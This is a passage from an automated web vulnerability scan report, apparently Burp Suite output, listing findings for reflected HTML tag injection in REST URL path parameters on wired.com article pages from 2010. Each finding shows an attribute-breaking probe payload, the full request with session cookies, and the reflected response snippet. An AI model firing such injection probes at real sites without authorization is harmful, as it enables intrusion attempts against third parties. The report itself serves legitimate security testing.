Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:07 GMT
Date: Sun, 21 Nov 2010 23:12:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceb7b19"><a>3c1f34f3de ss_discoveries c_news">
...[SNIP]...

1.723. http://www.wired.com/science/discoveries/news/2008/08/dayintech_0814 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/08/dayintech_0814

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9bda"><a>691a36c089b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesa9bda"><a>691a36c089b/news/2008/08/dayintech_0814 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:24 GMT
Date: Sun, 21 Nov 2010 23:12:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesa9bda"><a>691a36c089b c_news">
...[SNIP]...

1.724. http://www.wired.com/science/discoveries/news/2008/08/dayintech_0814 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/08/dayintech_0814

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d6e"><a>917d98e62c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsb8d6e"><a>917d98e62c1/2008/08/dayintech_0814 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:35 GMT
Date: Sun, 21 Nov 2010 23:12:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsb8d6e"><a>917d98e62c1">
...[SNIP]...

1.725. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0909 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/09/dayintech_0909

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65655"><a>3b9c63b3795 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science65655"><a>3b9c63b3795/discoveries/news/2008/09/dayintech_0909 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:53 GMT
Date: Sun, 21 Nov 2010 23:11:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science65655"><a>3b9c63b3795 ss_discoveries c_news">
...[SNIP]...

1.726. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0909 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/09/dayintech_0909

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62f1"><a>7d6cf2b9f7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesc62f1"><a>7d6cf2b9f7d/news/2008/09/dayintech_0909 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:11 GMT
Date: Sun, 21 Nov 2010 23:12:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesc62f1"><a>7d6cf2b9f7d c_news">
...[SNIP]...

1.727. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0909 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/09/dayintech_0909

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 565ee"><a>1a0dac16008 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news565ee"><a>1a0dac16008/2008/09/dayintech_0909 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:22 GMT
Date: Sun, 21 Nov 2010 23:12:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news565ee"><a>1a0dac16008">
...[SNIP]...

1.728. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0918 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/09/dayintech_0918

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c521b"><a>72e918e3af1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencec521b"><a>72e918e3af1/discoveries/news/2008/09/dayintech_0918 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:35 GMT
Date: Sun, 21 Nov 2010 23:11:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencec521b"><a>72e918e3af1 ss_discoveries c_news">
...[SNIP]...

1.729. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0918 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/09/dayintech_0918

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2adc6"><a>beef516bcac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries2adc6"><a>beef516bcac/news/2008/09/dayintech_0918 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:50 GMT
Date: Sun, 21 Nov 2010 23:11:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries2adc6"><a>beef516bcac c_news">
...[SNIP]...

1.730. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0918 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/09/dayintech_0918

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4249"><a>a52de65f3e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newse4249"><a>a52de65f3e1/2008/09/dayintech_0918 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:04 GMT
Date: Sun, 21 Nov 2010 23:12:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newse4249"><a>a52de65f3e1">
...[SNIP]...

1.731. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0924 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/09/dayintech_0924

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b0f"><a>3dff3cb2f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienced7b0f"><a>3dff3cb2f8/discoveries/news/2008/09/dayintech_0924 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:31 GMT
Date: Sun, 21 Nov 2010 23:11:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienced7b0f"><a>3dff3cb2f8 ss_discoveries c_news">
...[SNIP]...

1.732. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0924 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/09/dayintech_0924

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7f61"><a>3d1be35ff38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesf7f61"><a>3d1be35ff38/news/2008/09/dayintech_0924 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:47 GMT
Date: Sun, 21 Nov 2010 23:11:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesf7f61"><a>3d1be35ff38 c_news">
...[SNIP]...

1.733. http://www.wired.com/science/discoveries/news/2008/09/dayintech_0924 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/09/dayintech_0924

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4422"><a>a534ad9c864 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsd4422"><a>a534ad9c864/2008/09/dayintech_0924 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:59 GMT
Date: Sun, 21 Nov 2010 23:11:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsd4422"><a>a534ad9c864">
...[SNIP]...

1.734. http://www.wired.com/science/discoveries/news/2008/10/dayintech_1009 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/10/dayintech_1009

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba756"><a>b214819a45e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceba756"><a>b214819a45e/discoveries/news/2008/10/dayintech_1009 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:08 GMT
Date: Sun, 21 Nov 2010 23:12:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceba756"><a>b214819a45e ss_discoveries c_news">
...[SNIP]...

1.735. http://www.wired.com/science/discoveries/news/2008/10/dayintech_1009 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/10/dayintech_1009

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8bf"><a>b68eabdde0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries1c8bf"><a>b68eabdde0a/news/2008/10/dayintech_1009 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:26 GMT
Date: Sun, 21 Nov 2010 23:12:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries1c8bf"><a>b68eabdde0a c_news">
...[SNIP]...

1.736. http://www.wired.com/science/discoveries/news/2008/10/dayintech_1009 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/10/dayintech_1009

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1072c"><a>d415fcc8a35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news1072c"><a>d415fcc8a35/2008/10/dayintech_1009 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:38 GMT
Date: Sun, 21 Nov 2010 23:12:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news1072c"><a>d415fcc8a35">
...[SNIP]...

1.737. http://www.wired.com/science/discoveries/news/2008/10/dayintech_1014 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/10/dayintech_1014

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d636"><a>723f04a76bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science8d636"><a>723f04a76bb/discoveries/news/2008/10/dayintech_1014 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:09 GMT
Date: Sun, 21 Nov 2010 23:12:09 GMT
Connection: close


